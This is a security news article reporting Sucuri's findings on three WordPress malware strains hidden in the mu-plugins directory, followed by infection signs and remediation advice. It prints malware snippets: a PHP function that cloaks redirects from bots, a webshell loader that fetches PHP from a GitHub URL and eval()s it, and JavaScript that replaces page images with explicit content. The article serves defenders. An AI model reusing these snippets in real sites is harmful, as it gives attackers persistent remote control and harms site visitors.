• Vulnerable U
  • Posts
  • Stealthy WordPress Malware Exploits Mu-Plugins Directory

Stealthy WordPress Malware Exploits Mu-Plugins Directory

Attackers are hiding malware in WordPress mu-plugins, bypassing detection and gaining persistent access. Learn how it works and how to secure your site.

Author

Newsroom
March 30, 2025

Security researchers at Sucuri have uncovered a new wave of WordPress malware that leverages one of the platform's lesser-known features: the mu-plugins directory. This attack vector, long overlooked in many WordPress security audits, is now being exploited to deliver malware that is stealthy, persistent, and difficult to remove.

The discovery highlights how attackers are evolving their techniques to stay hidden from both administrators and automated security tools. By embedding malware in the Must-Use plugins folder, a location that loads automatically and isn’t visible from the WordPress plugin dashboard, threat actors gain long-term access with minimal chance of detection.

What Are Mu-Plugins, and Why Do They Matter?

Must-Use plugins, or mu-plugins, are a WordPress feature that allows certain plugins to run automatically without the need for activation through the admin interface. They live in a specific folder: /wp-content/mu-plugins/. Unlike standard plugins, these are loaded on every request and do not appear in the plugin UI, making them an ideal place for malware to hide.

Sucuri’s incident response team has identified three distinct strains of malware exploiting this exact mechanism. Each one with a different function but a shared goal: persistence and control.

Three Flavors of Malware Targeting Mu-Plugins

1. Fake Update Redirection Malware

The first malware sample Sucuri uncovered is designed to conditionally redirect site visitors to malicious external domains, depending on who they are.

The code — located in wp-content/mu-plugins/redirect.php — includes a function to detect bots and administrators. If the user is determined to be a bot (like Googlebot or Bingbot), the redirection is skipped to avoid detection by search engines or monitoring tools. 

function is_bot() {
    $bot_agents = ['bot', 'crawl', 'spider', 'Googlebot', 'bingbot', 'Baiduspider', 'YandexBot', ...];
    $user_agent = strtolower($_SERVER['HTTP_USER_AGENT'] ?? '');
    foreach ($bot_agents as $bot) {
        if (strpos($user_agent, $bot) !== false) {
            return true;
        }
    }
    return false;
}

For regular site visitors, however, the script redirects them to a malicious domain — updatesnow[.]net — likely hosting malware or phishing pages. This behavior not only compromises user trust but can also result in blacklisting by Google Safe Browsing or other reputation services.

2. Remote Code Execution via Webshell

The second malware variant is far more insidious. Disguised as a core plugin file (./wp-content/mu-plugins/index.php), it provides remote code execution capabilities by downloading and executing a PHP script from GitHub.

This means attackers don’t need to continuously update the infected site — they can update their malicious payload remotely, and it will be reloaded every time WordPress runs. 

$externalResource = "https://raw.githubusercontent.com/starkvps99812/upd/refs/heads/main/BypassBest.php";
$retrievedCode = curl_exec(curl_init($externalResource));
eval("?>" . $retrievedCode);

This type of setup allows dynamic payload switching and virtually unlimited control over the site — from uploading backdoors and keyloggers to deploying crypto miners or launching lateral attacks on shared hosting environments.

The third and final variant identified is a spam injection script found in custom-js-loader.php within the mu-plugins directory. It employs JavaScript to deface the website by replacing all image elements with explicit content hosted on a CDN, and intercepts outbound links to redirect users to popups or spam domains. 

document.querySelectorAll("img").forEach(link => {
    link.src = "https://imagex1[.]sx[.]cdn[.]live/images/pinporn/2022/02/23/26777510.gif";
});

In addition to the reputational harm this causes, such attacks can get domains blacklisted by ad networks and search engines, reducing traffic and ad revenue dramatically. This type of campaign is often tied to blackhat SEO tactics or monetized scam networks.

Signs of Infection

Sucuri notes several indicators that may suggest a WordPress site has been compromised in this way:

  • Users are redirected to unfamiliar websites

  • Suspicious PHP or JS files appear in /wp-content/mu-plugins/

  • Increased server resource usage without traffic spikes

  • Unauthorized admin accounts in the WordPress backend

  • Changes to image content or outbound links

These signs are often subtle or attributed to plugin conflicts, allowing malware to persist longer before detection.

How Are Attackers Getting In?

While Sucuri doesn’t name a single root cause for these infections, several common attack vectors are likely at play:

  • Outdated or vulnerable plugins/themes: Exploiting known CVEs to write files into the mu-plugins directory

  • Stolen admin credentials: Gaining backend access to manually deploy malicious files

  • Poor hosting hygiene: Weak file permissions or shared server misconfigurations that allow lateral movement

Once inside, attackers use the mu-plugins mechanism to ensure their payload is loaded early in the WordPress execution chain and reloaded after any cleanup effort unless the mu-plugins folder is specifically reviewed.

What Site Owners Should Do

Sucuri recommends a multi-step approach to detect and remediate infections in the mu-plugins folder:

  1. Scan the entire WordPress installation — especially /wp-content/mu-plugins/ — for unfamiliar files.

  2. Audit all admin accounts and remove any that look suspicious.

  3. Review the list of active plugins and remove anything that wasn’t intentionally installed.

  4. Update WordPress core, plugins, and themes to their latest versions.

  5. Change all admin passwords and enable two-factor authentication (2FA).

  6. Deploy a file integrity monitoring system or use a security plugin to alert on unexpected changes.

Additionally, implementing a web application firewall (WAF) can help block malicious file uploads and remote code execution attempts before they reach the WordPress backend.

Why This Attack Vector Works

What makes this campaign particularly dangerous is how well it blends into WordPress’s normal behavior. Must-Use plugins are intended for legitimate use cases, such as forcing specific performance or security plugins to load early. But their quiet, automatic execution creates an opportunity for abuse.

By abusing mu-plugins, attackers bypass dashboard visibility, security plugins that only monitor standard plugin directories, and many manual inspection processes.

The Takeaway

This isn’t the first time attackers have targeted overlooked parts of WordPress installations — but it’s one of the more effective uses of native functionality to maintain stealth. The rise in abuse of the mu-plugins directory should serve as a wake-up call for developers, administrators, and security teams.

If your WordPress security strategy doesn’t include routine checks of auto-loading plugin directories, now is the time to update your playbook.

As attackers continue to innovate, defenders need to think like them — and monitor the paths less traveled.